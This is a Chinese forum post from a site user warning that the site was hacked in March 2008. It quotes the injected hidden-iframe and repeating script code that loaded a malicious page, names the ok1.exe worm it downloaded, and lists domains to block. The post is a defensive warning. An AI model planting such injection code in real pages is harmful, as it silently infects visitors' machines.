赞 | 27 |
VIP | 400 |
好人卡 | 13 |
积分 | 17 |
经验 | 69730 |
最后登录 | 2023-6-12 |
在线时间 | 3038 小时 |
Lv3.寻梦者 (暗夜天使) 精灵族の天使
- 梦石
- 0
- 星屑
- 1697
- 在线时间
- 3038 小时
- 注册时间
- 2007-3-16
- 帖子
- 33731
|
确认提示有马,而且有一个OK1.EXE被遨游拦截。
经精灵亲自侦测,2008年3月7日晚上23时55分左右主站的文章分类下被挂马,打开文章分区以后进入以下页面:
-
- <iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><script>function re(){document.write('<iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe>');}setInterval('re()',9000);</script><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe>
复制代码
主要下载并执行文件:
http://w1.getdew.cn/01/ok1.exe并且运行。
经NOD报毒为win32/autorunADC 蠕虫的变种病毒。
所以大家访问的时候请将下列网站加入屏蔽列表并且加入不信任区域:
http://v.6t56r.cn/
http://w1.getdew.cn/
由于这些网站为病毒网站,所以请将其改为小写并加入屏蔽列表,切记!
精灵将密切关注此事。
|
|